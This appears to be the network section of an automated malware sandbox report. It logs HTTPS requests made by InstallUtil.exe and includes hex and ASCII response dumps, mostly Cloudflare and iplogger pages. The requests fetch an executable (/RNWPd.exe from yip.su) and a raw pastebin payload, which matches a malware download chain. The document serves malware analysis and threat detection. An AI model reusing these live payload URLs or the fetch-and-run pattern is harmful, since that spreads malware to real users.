                                                2024-08-09 21:00:59 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:00:59 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:00:59 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:00:59 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:00:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649725188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:00 UTC900INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:00 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:00 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2FgNGfyPfVnEcrCcvXmoArTXBgmU1FVRtLU4z%2BWsAcfusoDzdbxcd5D5pKNHTx2Iauzx9TFdJyhdf6sMeHXjmPo8tdrUIXB7IbjP4i%2BPKFXtVRIdkIW0S1A%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aadcfaa99c466-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:00 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:00 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                                                Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                                                2024-08-09 21:01:00 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                                                Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                                                2024-08-09 21:01:00 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                                                Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                                                2024-08-09 21:01:00 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                                                Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                                                2024-08-09 21:01:00 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                                                Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                                                2024-08-09 21:01:00 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649727172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:05 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:05 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aadef98f1728d-EWR
                                                2024-08-09 21:01:05 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:05 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:05 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:05 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.649728188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:06 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:06 UTC898INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:06 +0000
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: EXPIRED
                                                Last-Modified: Fri, 09 Aug 2024 21:01:06 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhPuneKNN1AF9soudF8QZ7V47kXPt84eiUO%2FrLBM3mP5%2BXiRAEmWKlJT6Otjm1VEgmSJkH2VbHvZfxG7vbdlNu3TkCa0bW2Xa7UHotzdOI50o1mKDLlkXII%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aadf3e9c9c461-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:06 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:06 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                                                Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
